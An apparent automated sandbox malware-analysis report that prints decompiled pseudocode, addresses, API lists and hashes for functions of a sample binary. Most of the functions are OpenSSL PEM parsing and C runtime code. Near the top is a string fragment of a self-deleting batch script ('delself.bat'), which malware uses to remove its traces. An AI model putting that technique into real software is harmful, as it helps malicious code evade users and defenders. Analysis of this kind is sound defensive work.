String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
API String ID: 2372642624-488272950
Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 56%

			E004635B0(void* __ebx, intOrPtr* __edx, void* __ebp, char _a4, char _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28, char _a32, char _a36, char _a132, char _a137, char _a141, char _a143, char _a386, signed int _a388, intOrPtr _a396, intOrPtr* _a400, intOrPtr* _a404, intOrPtr* _a408, intOrPtr* _a412) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void* __edi;
				void* __esi;
				signed int _t125;
				void* _t141;
				void* _t146;
				void* _t151;
				void* _t157;
				intOrPtr _t159;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t173;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				intOrPtr _t183;
				char _t186;
				intOrPtr _t188;
				intOrPtr _t193;
				intOrPtr _t206;
				intOrPtr _t210;
				intOrPtr _t218;
				void* _t219;
				intOrPtr _t222;
				intOrPtr _t224;
				char _t236;
				void* _t237;
				void* _t240;
				void* _t241;
				intOrPtr _t244;
				intOrPtr _t251;
				void* _t252;
				intOrPtr _t253;
				intOrPtr _t257;
				void* _t258;
				intOrPtr* _t261;
				intOrPtr _t262;
				intOrPtr _t263;
				intOrPtr _t264;
				intOrPtr* _t265;
				void* _t266;
				intOrPtr _t267;
				intOrPtr _t269;
				signed int _t271;
				signed int _t272;
				void* _t274;
				void* _t275;
				void* _t279;
				void* _t280;
				void* _t284;

				_t247 = __edx;
				E0042F7C0(0x188);
				_t125 =  *0x50ad20; // 0xcafe2c1d
				_a388 = _t125 ^ _t271;
				_push(__ebx);
				_a16 = _a400;
				_push(__ebp);
				_a28 = _a404;
				_t251 = _a396;
				_a20 = _a408;
				_a12 = _t251;
				_a24 = _a412;
				_a4 = 0;
				_t236 = E0045AF30(__ebx, __edx, _t251);
				_a8 = _t236;
				_t257 = E0045AF30(_t236, __edx, _t251);
				_v0 = _t257;
				_t269 = E0045AF30(_t236, __edx, _t251);
				if(_t236 == 0 || _t257 == 0 || _t269 == 0) {
					E0045AD10(_t236);
					E0045AD10(_t257);
					E0045AD10(_t269);
					E004512D0(_t236, _t247, _t251, _t269, __eflags, 9, 0x6d, 0x41, ".\\crypto\\pem\\pem_lib.c", 0x2b4);
					_t272 = _t271 + 0x20;
					goto L72;
				} else {
					_a386 = 0;
					_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
					_t274 = _t271 + 0xc;
					_t284 = _t141;
					if(_t284 <= 0) {
						L14:
						_push(0x2bf);
						_push(".\\crypto\\pem\\pem_lib.c");
						_push(0x6c);
						goto L15;
					} else {
						do {
							if(_t284 >= 0) {
								while( *((char*)(_t274 + _t141 + 0x94)) <= 0x20) {
									_t141 = _t141 - 1;
									if(_t141 >= 0) {
										continue;
									}
									goto L8;
								}
							}
							L8:
							 *((char*)(_t274 + _t141 + 0x95)) = 0xa;
							_t146 = _t141 + 2;
							if(_t146 >= 0x100) {
								L74:
								E0042AC83();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t251);
								_t253 = E0044F960(_t236, _t247, E004656B0());
								__eflags = _t253;
								if(__eflags != 0) {
									_push(_t257);
									E0044F3E0(_t253, _t269, _t253, 0x6a, 0, _v12);
									_push(_a4);
									_push(_v0);
									_push(_v4);
									_push(_v8);
									_push(_t253);
									_t151 = E00463C30(_t247, _t269);
									E0044F5E0(_t253);
									return _t151;
								} else {
									E004512D0(_t236, _t247, _t253, _t269, __eflags, 9, 0x71, 7, ".\\crypto\\pem\\pem_lib.c", 0x248);
									__eflags = 0;
									return 0;
								}
							} else {
								 *((char*)(_t274 + _t146 + 0x98)) = 0;
								_t157 = E00448190( &_a132, "-----BEGIN ", 0xb);
								_t279 = _t274 + 0xc;
								if(_t157 != 0) {
									goto L13;
								} else {
									_t261 =  &_a143;
									_t240 = _t261 + 1;
									do {
										_t159 =  *_t261;
										_t261 = _t261 + 1;
									} while (_t159 != 0);
									_t257 = _t261 - _t240;
									_t162 = E00448190( &_a137 + _t257, "-----\n", 6);
									_t279 = _t279 + 0xc;
									if(_t162 == 0) {
										_t164 = E0045AD50(_t236, _t247, _t269, _t236, _t257 + 9);
										_t274 = _t279 + 8;
										__eflags = _t164;
										if(__eflags != 0) {
											E0042D8D0( *((intOrPtr*)(_t236 + 4)),  &_a143, _t257 - 6);
											_t168 =  *((intOrPtr*)(_t236 + 4));
											_t236 = 0;
											 *((char*)(_t168 + _t257 - 6)) = 0;
											_t262 = _v0;
											_t169 = E0045AD50(0, _t247, _t269, _t262, 0x100);
											_t274 = _t274 + 0x14;
											__eflags = _t169;
											if(__eflags != 0) {
												 *((char*)( *((intOrPtr*)(_t262 + 4)))) = 0;
												_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
												_t274 = _t274 + 0xc;
												__eflags = _t263;
												if(__eflags <= 0) {
													L32:
													_t264 = 0;
													__eflags = 0;
													goto L33;
												} else {
													do {
														if(__eflags >= 0) {
															while(1) {
																__eflags =  *((char*)(_t274 + _t263 + 0x94)) - 0x20;
																if( *((char*)(_t274 + _t263 + 0x94)) > 0x20) {
																	goto L27;
																}
																_t263 = _t263 - 1;
																__eflags = _t263;
																if(_t263 >= 0) {
																	continue;
																}
																goto L27;
															}
														}
														L27:
														 *((char*)(_t274 + _t263 + 0x95)) = 0xa;
														_t257 = _t263 + 2;
														__eflags = _t257 - 0x100;
														if(_t257 >= 0x100) {
															goto L74;
														} else {
															 *((char*)(_t274 + _t257 + 0x94)) = 0;
															__eflags = _a132 - 0xa;
															if(_a132 == 0xa) {
																goto L32;
															} else {
																_t251 = _t257 + _t236;
																_t222 = E0045AD50(_t236, _t247, _t269, _v0, _t251 + 9);
																_t274 = _t274 + 8;
																__eflags = _t222;
																if(__eflags == 0) {
																	_push(0x2e4);
																	goto L22;
																} else {
																	_t224 = E00448190( &_a132, "-----END ", 9);
																	_t274 = _t274 + 0xc;
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_t251 = _a12;
																		_t264 = 1;
																		L33:
																		_a4 = 0;
																		_t173 = E0045AD50(_t236, _t247, _t269, _t269, 0x400);
																		_t274 = _t274 + 8;
																		__eflags = _t173;
																		if(__eflags != 0) {
																			 *_a4 = 0;
																			__eflags = _t264;
																			if(_t264 != 0) {
																				_t251 = _t269;
																				_v0 = _t251;
																				_t269 = _v0;
																				_a4 = _t236;
																				goto L51;
																			} else {
																				_t267 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
																				_t274 = _t274 + 0xc;
																				__eflags = _t267;
																				if(_t267 <= 0) {
																					L50:
																					_t251 = _v0;
																					L51:
																					_t236 = _a8;
																					_t265 =  *((intOrPtr*)(_t236 + 4));
																					_t83 = _t265 + 1; // 0x9
																					_t241 = _t83;
																					do {
																						_t176 =  *_t265;
																						_t265 = _t265 + 1;
																						__eflags = _t176;
																					} while (_t176 != 0);
																					_t266 = _t265 - _t241;
																					_t178 = E00448190( &_a132, "-----END ", 9);
																					_t274 = _t274 + 0xc;
																					__eflags = _t178;
																					if(__eflags != 0) {
																						L70:
																						_push(0x322);
																						_push(".\\crypto\\pem\\pem_lib.c");
																						_push(0x66);
																						goto L15;
																					} else {
																						_t180 = E00448190( *((intOrPtr*)(_t236 + 4)),  &_a141, _t266);
																						_t274 = _t274 + 0xc;
																						__eflags = _t180;
																						if(__eflags != 0) {
																							goto L70;
																						} else {
																							_t183 = E00448190( &_a141 + _t266, "-----\n", 6);
																							_t274 = _t274 + 0xc;
																							__eflags = _t183;
																							if(__eflags != 0) {
																								goto L70;
																							} else {
																								E0047E5B0( &_a36);
																								_push(_a4);
																								_t186 = _a4;
																								_push(_t186);
																								_push( &_a4);
																								_push(_t186);
																								_push( &_a36);
																								_t188 = E0047E5D0();
																								_t274 = _t274 + 0x18;
																								__eflags = _t188;
																								if(__eflags >= 0) {
																									_t193 = E0047E560( &_a36, _a4 + _a4,  &_a32);
																									_t275 = _t274 + 0xc;
																									__eflags = _t193;
																									if(__eflags >= 0) {
																										_t244 = _a4 + _a32;
																										__eflags = _t244;
																										_a4 = _t244;
																										if(_t244 == 0) {
																											goto L17;
																										} else {
																											 *_a16 =  *((intOrPtr*)(_t236 + 4));
																											 *_a28 =  *((intOrPtr*)(_t251 + 4));
																											_t247 = _a20;
																											 *_a20 = _a4;
																											 *_a24 = _t244;
																											E00454C70(_t236);
																											E00454C70(_t251);
																											E00454C70(_t269);
																											_t272 = _t275 + 0xc;
																										}
																									} else {
																										_push(0x332);
																										_push(".\\crypto\\pem\\pem_lib.c");
																										_push(0x64);
																										goto L15;
																									}
																								} else {
																									_push(0x32c);
																									_push(".\\crypto\\pem\\pem_lib.c");
																									_push(0x64);
																									goto L15;
																								}
																							}
																						}
																					}
																					goto L73;
																				} else {
																					_t236 = 0;
																					__eflags = _t267;
																					do {
																						if(__eflags >= 0) {
																							while(1) {
																								__eflags =  *((char*)(_t274 + _t267 + 0x94)) - 0x20;
																								if( *((char*)(_t274 + _t267 + 0x94)) > 0x20) {
																									goto L44;
																								}
																								_t267 = _t267 - 1;
																								__eflags = _t267;
																								if(_t267 >= 0) {
																									continue;
																								}
																								goto L44;
																							}
																						}
																						L44:
																						 *((char*)(_t274 + _t267 + 0x95)) = 0xa;
																						_t257 = _t267 + 2;
																						__eflags = _t257 - 0x100;
																						if(_t257 >= 0x100) {
																							goto L74;
																						} else {
																							__eflags = _t257 - 0x41;
																							 *((char*)(_t274 + _t257 + 0x94)) = 0;
																							_t236 =  !=  ? 1 : _t236;
																							_t206 = E00448190( &_a132, "-----END ", 9);
																							_t274 = _t274 + 0xc;
																							__eflags = _t206;
																							if(_t206 == 0) {
																								goto L50;
																							} else {
																								__eflags = _t257 - 0x41;
																								if(_t257 > 0x41) {
																									goto L50;
																								} else {
																									_t210 = E0045AE30(_t236, _t247, _t269, _t269, _a4 + 9 + _t257);
																									_t274 = _t274 + 8;
																									__eflags = _t210;
																									if(__eflags == 0) {
																										_push(0x303);
																										goto L22;
																									} else {
																										E0042D8D0(_a4 + _a4,  &_a132, _t257);
																										_t280 = _t274 + 0xc;
																										_push(0xfe);
																										 *((char*)(_a4 + _t257 + _a4)) = 0;
																										_a4 = _a4 + _t257;
																										_push( &_a132);
																										_push(_t251);
																										__eflags = _t236;
																										if(_t236 != 0) {
																											_a132 = 0;
																											_t218 = E0044F780(_t251, _t269);
																											_t274 = _t280 + 0xc;
																											__eflags = _t218;
																											if(_t218 <= 0) {
																												goto L50;
																											} else {
																												while(1) {
																													__eflags =  *((char*)(_t274 + _t218 + 0x94)) - 0x20;
																													if( *((char*)(_t274 + _t218 + 0x94)) > 0x20) {
																														break;
																													}
																													_t218 = _t218 - 1;
																													__eflags = _t218;
																													if(_t218 >= 0) {
																														continue;
																													}
																													break;
																												}
																												 *((char*)(_t274 + _t218 + 0x95)) = 0xa;
																												_t219 = _t218 + 2;
																												__eflags = _t219 - 0x100;
																												if(_t219 >= 0x100) {
																													goto L74;
																												} else {
																													 *((char*)(_t274 + _t219 + 0x94)) = 0;
																													goto L50;
																												}
																											}
																										} else {
																											goto L49;
																										}
																									}
																								}
																							}
																						}
																						goto L77;
																						L49:
																						_t267 = E0044F780(_t251, _t269);
																						_t274 = _t280 + 0xc;
																						__eflags = _t267;
																					} while (__eflags > 0);
																					goto L50;
																				}
																			}
																		} else {
																			_push(0x2f1);
																			goto L22;
																		}
																	} else {
																		goto L31;
																	}
																}
															}
														}
														goto L77;
														L31:
														E0042D8D0( *((intOrPtr*)(_v0 + 4)) + _t236,  &_a132, _t257);
														 *((char*)( *((intOrPtr*)(_v0 + 4)) + _t257 + _t236)) = 0;
														_t236 = _t251;
														_t251 = _a12;
														_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
														_t274 = _t274 + 0x18;
														__eflags = _t263;
													} while (__eflags > 0);
													goto L32;
												}
											} else {
												_push(0x2d8);
												L22:
												_push(".\\crypto\\pem\\pem_lib.c");
												_push(0x41);
												_push(0x6d);
												_push(9);
												E004512D0(_t236, _t247, _t251, _t269, __eflags);
												_t236 = _a8;
												goto L16;
											}
										} else {
											_push(0x2ce);
											_push(".\\crypto\\pem\\pem_lib.c");
											_push(0x41);
											L15:
											_push(0x6d);
											_push(9);
											E004512D0(_t236, _t247, _t251, _t269, _t291);
											L16:
											_t275 = _t274 + 0x14;
											L17:
											E0045AD10(_t236);
											E0045AD10(_v0);
											E0045AD10(_t269);
											_t272 = _t275 + 0xc;
											L72:
											L73:
											_pop(_t252);
											_pop(_t258);
											_pop(_t237);
											return E0042A77E(_t237, _a388 ^ _t272, _t247, _t252, _t258);
										}
									} else {
										goto L13;
									}
								}
							}
							goto L77;
							L13:
							_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
							_t274 = _t279 + 0xc;
							_t291 = _t141;
						} while (_t141 > 0);
						goto L14;
					}
				}
				L77:
			}

0x004635b0
0x004635b5
0x004635ba
0x004635c1
0x004635cf
0x004635d0
0x004635db
0x004635dc
0x004635e9
0x004635f0
0x004635fb
0x004635ff
0x00463603
0x00463610
0x00463612
0x0046361b
0x0046361d
0x00463626
0x0046362a
0x00463b6f
0x00463b75
0x00463b7b
0x00463b90
0x00463b95
0x00000000
0x00463640
0x0046364c
0x00463656
0x0046365b
0x0046365e
0x00463660
0x00463704
0x00463704
0x00463709
0x0046370e
0x00000000
0x00463666
0x00463666
0x00463666
0x00463670
0x0046367a
0x0046367b
0x00000000
0x00000000
0x00000000
0x0046367b
0x00463670
0x0046367d
0x0046367d
0x00463685
0x0046368d
0x00463bb3
0x00463bb3
0x00463bb8
0x00463bb9
0x00463bba
0x00463bbb
0x00463bbc
0x00463bbd
0x00463bbe
0x00463bbf
0x00463bc0
0x00463bcc
0x00463bd1
0x00463bd3
0x00463bf1
0x00463bfb
0x00463c00
0x00463c04
0x00463c08
0x00463c0c
0x00463c10
0x00463c11
0x00463c19
0x00463c25
0x00463bd5
0x00463be5
0x00463bed
0x00463bf0
0x00463bf0
0x00463693
0x00463695
0x004636aa
0x004636af
0x004636b4
0x00000000
0x004636b6
0x004636b6
0x004636bd
0x004636c0
0x004636c0
0x004636c2
0x004636c3
0x004636c7
0x004636da
0x004636df
0x004636e4
0x0046373e
0x00463743
0x00463746
0x00463748
0x00463767
0x0046376c
0x0046376f
0x00463776
0x0046377b
0x00463780
0x00463785
0x00463788
0x0046378a
0x004637b2
0x004637c2
0x004637c4
0x004637c7
0x004637c9
0x0046388c
0x0046388c
0x0046388c
0x00000000
0x004637cf
0x004637cf
0x004637cf
0x004637d1
0x004637d1
0x004637d9
0x00000000
0x00000000
0x004637db
0x004637db
0x004637dc
0x00000000
0x00000000
0x00000000
0x004637dc
0x004637d1
0x004637de
0x004637de
0x004637e6
0x004637e9
0x004637ef
0x00000000
0x004637f5
0x004637f5
0x004637fd
0x00463805
0x00000000
0x0046380b
0x0046380b
0x00463816
0x0046381b
0x0046381e
0x00463820
0x004638bd
0x00000000
0x00463826
0x00463835
0x0046383a
0x0046383d
0x0046383f
0x004638b2
0x004638b6
0x0046388e
0x00463894
0x0046389c
0x004638a1
0x004638a4
0x004638a6
0x004638ca
0x004638cd
0x004638cf
0x00463ace
0x00463ad0
0x00463ad4
0x00463ad6
0x00000000
0x004638d5
0x004638e8
0x004638ea
0x004638ed
0x004638ef
0x004639c4
0x004639c4
0x004639c8
0x004639c8
0x004639cc
0x004639cf
0x004639cf
0x004639d2
0x004639d2
0x004639d4
0x004639d5
0x004639d5
0x004639e2
0x004639ea
0x004639ef
0x004639f2
0x004639f4
0x00463b5d
0x00463b5d
0x00463b62
0x00463b67
0x00000000
0x004639fa
0x00463a06
0x00463a0b
0x00463a0e
0x00463a10
0x00000000
0x00463a16
0x00463a27
0x00463a2c
0x00463a2f
0x00463a31
0x00000000
0x00463a37
0x00463a3c
0x00463a41
0x00463a45
0x00463a4c
0x00463a4d
0x00463a4e
0x00463a53
0x00463a54
0x00463a59
0x00463a5c
0x00463a5e
0x00463af1
0x00463af6
0x00463af9
0x00463afb
0x00463b12
0x00463b12
0x00463b16
0x00463b1a
0x00000000
0x00463b20
0x00463b28
0x00463b31
0x00463b33
0x00463b3a
0x00463b40
0x00463b42
0x00463b48
0x00463b4e
0x00463b53
0x00463b56
0x00463afd
0x00463afd
0x00463b02
0x00463b07
0x00000000
0x00463b07
0x00463a64
0x00463a64
0x00463a69
0x00463a6e
0x00000000
0x00463a6e
0x00463a5e
0x00463a31
0x00463a10
0x00000000
0x004638f5
0x004638f5
0x004638f7
0x004638f9
0x004638f9
0x00463900
0x00463900
0x00463908
0x00000000
0x00000000
0x0046390a
0x0046390a
0x0046390b
0x00000000
0x00000000
0x00000000
0x0046390b
0x00463900
0x0046390d
0x0046390d
0x00463915
0x00463918
0x0046391e
0x00000000
0x00463924
0x00463924
0x00463927
0x00463936
0x00463946
0x0046394b
0x0046394e
0x00463950
0x00000000
0x00463952
0x00463952
0x00463955
0x00000000
0x00463957
0x00463962
0x00463967
0x0046396a
0x0046396c
0x00463ac0
0x00000000
0x00463972
0x00463983
0x0046398b
0x00463994
0x00463999
0x004639a4
0x004639a8
0x004639a9
0x004639aa
0x004639ac
0x00463a75
0x00463a7d
0x00463a82
0x00463a85
0x00463a87
0x00000000
0x00463a90
0x00463a90
0x00463a90
0x00463a98
0x00000000
0x00000000
0x00463a9a
0x00463a9a
0x00463a9b
0x00000000
0x00000000
0x00000000
0x00463a9b
0x00463a9d
0x00463aa5
0x00463aa8
0x00463aad
0x00000000
0x00463ab3
0x00463ab3
0x00000000
0x00463ab3
0x00463aad
0x00000000
0x00000000
0x00000000
0x004639ac
0x0046396c
0x00463955
0x00463950
0x00000000
0x004639b2
0x004639b7
0x004639b9
0x004639bc
0x004639bc
0x00000000
0x004638f9
0x004638ef
0x004638a8
0x004638a8
0x00000000
0x004638a8
0x00000000
0x00000000
0x00000000
0x0046383f
0x00463820
0x00463805
0x00000000
0x00463841
0x00463854
0x00463867
0x00463873
0x00463875
0x0046387f
0x00463881
0x00463884
0x00463884
0x00000000
0x004637cf
0x0046378c
0x0046378c
0x00463791
0x00463791
0x00463796
0x00463798
0x0046379a
0x0046379c
0x004637a1
0x00000000
0x004637a1
0x0046374a
0x0046374a
0x0046374f
0x00463754
0x00463710
0x00463710
0x00463712
0x00463714
0x00463719
0x00463719
0x0046371c
0x0046371d
0x00463726
0x0046372c
0x00463731
0x00463b98
0x00463b9a
0x00463ba1
0x00463ba2
0x00463ba4
0x00463bb2
0x00463bb2
0x00000000
0x00000000
0x00000000
0x004636e4
0x004636b4
0x00000000
0x004636e6
0x004636f4
0x004636f9
0x004636fc
0x004636fc
0x00000000
0x00463666
0x00463660
0x00000000

APIs

_strncmp.LIBCMT ref: 004636AA
_strncmp.LIBCMT ref: 004636DA
_strncmp.LIBCMT ref: 00463835
_strncmp.LIBCMT ref: 00463946
_strncmp.LIBCMT ref: 004639EA
_strncmp.LIBCMT ref: 00463A06
_strncmp.LIBCMT ref: 00463A27

Strings

, xrefs: 00463A90
-----END , xrefs: 0046382F, 00463940, 004639E4
.\crypto\pem\pem_lib.c, xrefs: 00463709, 0046374F, 00463791, 00463A69, 00463B02, 00463B62, 00463B85, 00463BDA
-----BEGIN , xrefs: 004636A4
-----, xrefs: 004636D4, 00463A21

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
API String ID: 909875538-2733969777
Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B

Uniqueness

Uniqueness Score: -1.00%

Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00425A97(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E00428C96(8, 1);
					_t48 = _t42;
					if(_t42 != 0) {
						_t12 = E00428C96(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E00428C96(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E004255AC( *_t42, 0x50aae8);
								_t15 = E00425E97(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E00420BED();
									E0042453C( *_t42);
									E004243E2( *_t42);
									E00420BED(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E00424BDD(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E00420BED( *_t42);
							E00420BED(_t42);
							L8:
							goto L3;
						}
						E00420BED(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00425208(_t48))) = 0xc;
					goto L4;
				}
			}

0x00425aa0
0x00425ac6
0x00000000
0x00425aa8
0x00425ab3
0x00425ab7
0x00425ab9
0x00425ad2
0x00425ad7
0x00425adb
0x00425add
0x00425aee
0x00425af3
0x00425af8
0x00425afa
0x00425b13
0x00425b20
0x00425b28
0x00425b2b
0x00425b2d
0x00425b42
0x00425b42
0x00425b49
0x00425b50
0x00425b56
0x00425b5e
0x00425b67
0x00000000
0x00425b67
0x00425b31
0x00425b34
0x00425b3b
0x00425b3d
0x00425b65
0x00000000
0x00425b65
0x00425b3f
0x00000000
0x00425b3f
0x00425afe
0x00425b04
0x00425ae5
0x00000000
0x00425ae5
0x00425ae0
0x00000000
0x00425ae0
0x00425abb
0x00425ac0
0x00000000
0x00425ac0

APIs

__calloc_crt.LIBCMT ref: 00425AAE

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__calloc_crt.LIBCMT ref: 00425AD2
_free.LIBCMT ref: 00425AE0
__calloc_crt.LIBCMT ref: 00425AEE
_free.LIBCMT ref: 00425AFE
_free.LIBCMT ref: 00425B04
__copytlocinfo_nolock.LIBCMT ref: 00425B13
__wsetlocale_nolock.LIBCMT ref: 00425B20
__setmbcp_nolock.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B42
___removelocaleref.LIBCMT ref: 00425B49
___freetlocinfo.LIBCMT ref: 00425B50
_free.LIBCMT ref: 00425B56

Memory Dump Source

Source File: 00000002.00000002.380176019.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.381419053.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.381432579.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: 17d3c2619d013419f6fb4dbcd9dc3d5229f96e394bca3e5d2eaf771417ff5058
Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
Opcode Fuzzy Hash: 17d3c2619d013419f6fb4dbcd9dc3d5229f96e394bca3e5d2eaf771417ff5058
Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320
windowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041BAE0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				char _v32;
				char _v40;
				char _v2308;
				char _v2312;
				intOrPtr _v2316;
				int _v2320;
				intOrPtr _v2328;
				int _v2332;
				short _v2336;
				intOrPtr _v2340;
				short _v2348;
				intOrPtr _v2352;
				int _v2356;
				short _v2372;
				char _v2376;
				int _v2384;
				int _v2388;
				intOrPtr _v2396;
				int _v2400;
				intOrPtr _v2404;
				long _v2408;
				intOrPtr _v2412;
				int _v2416;
				char _v2424;
				char _v2432;
				char _v2436;
				signed int _v2440;
				void* _v2448;
				intOrPtr _v2452;
				signed int _v2456;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t100;
				intOrPtr* _t101;
				long _t102;
				void* _t111;
				long _t117;
				void* _t125;
				void* _t128;
				void* _t136;
				intOrPtr _t140;
				long _t141;
				long _t150;
				intOrPtr* _t151;
				long _t152;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t158;
				void* _t161;
				int _t164;
				intOrPtr* _t165;
				signed int _t170;
				short* _t171;
				short* _t172;
				intOrPtr* _t176;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				DWORD* _t194;
				struct HWND__* _t195;
				struct HWND__* _t203;
				intOrPtr _t206;
				intOrPtr _t208;
				signed int _t211;
				signed int _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				short* _t218;
				short* _t219;
				void* _t221;

				_t212 = _t211 & 0xfffffff8;
				_t164 = _a8;
				_push(0xffffffff);
				_push(0x4cb187);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t212;
				_t213 = _t212 - 0x978;
				_push(_t158);
				_push(_t191);
				_t221 = _t164 - 0x8001;
				if(_t221 > 0) {
					_t100 = _t164 - 0x8003;
					__eflags = _t100;
					if(_t100 == 0) {
						_t165 =  *0x513268;
						_t101 =  *_t165;
						__eflags = _t101 - _t165;
						if(_t101 == _t165) {
							L46:
							__eflags =  *0x52923c;
							if( *0x52923c != 0) {
								goto L50;
							} else {
								goto L47;
							}
						} else {
							while(1) {
								__eflags =  *((char*)(_t101 + 0xd));
								if( *((char*)(_t101 + 0xd)) != 0) {
									break;
								}
								_t101 =  *_t101;
								__eflags = _t101 - _t165;
								if(_t101 != _t165) {
									continue;
								} else {
									goto L46;
								}
								goto L51;
							}
							L50:
							_t102 = DefWindowProcW(_a4, 0x8003, _a12, _a16);
							 *[fs:0x0] = _v16;
							return _t102;
						}
					} else {
						__eflags = _t100 == 1;
						if(_t100 == 1) {
							_v2408 = 0x400;
							_t205 = E00420C62(_t158, _t187, _t191, 0x800);
							GetComputerNameW(_t107,  &_v2408);
							_v2412 = 7;
							_v2416 = 0;
							_v2432 = 0;
							_v8 = 0;
							_t111 = E00413100( &_v2348, _t191, L"\\\\");
							_v12 = 1;
							_t194 = E0041CE80( &_v2376, _t111, _t205);
							_t215 = _t213 + 8;
							__eflags =  &_v2436 - _t194;
							if( &_v2436 != _t194) {
								__eflags = 0;
								_v2412 = 7;
								_v2416 = 0;
								_v2432 = 0;
								E004145A0( &_v2432, _t194);
							}
							__eflags = _v2352 - 8;
							if(_v2352 >= 8) {
								L00422587(_v2372);
								_t215 = _t215 + 4;
							}
							_v2352 = 7;
							_v8 = 0;
							__eflags = _v2328 - 8;
							_v2356 = 0;
							_v2372 = 0;
							if(_v2328 >= 8) {
								L00422587(_v2348);
								_t215 = _t215 + 4;
							}
							_v2328 = 7;
							_v2332 = 0;
							_v2348 = 0;
							E00420BED(_t205);
							_t206 =  *0x529240; // 0x0
							_t170 = 0;
							_t216 = _t215 + 4;
							_v2440 = 0;
							__eflags = _t206 -  *0x529244; // 0x0
							if(__eflags == 0) {
								L37:
								_t195 = _a4;
								_t208 =  *((intOrPtr*)( *0x513268));
								_t117 = IsWindow(_t195);
								__eflags = _t117;
								if(_t117 != 0) {
									__eflags =  *(_t208 + 0x8c8);
									if( *(_t208 + 0x8c8) <= 0) {
										 *0x529224 = 1;
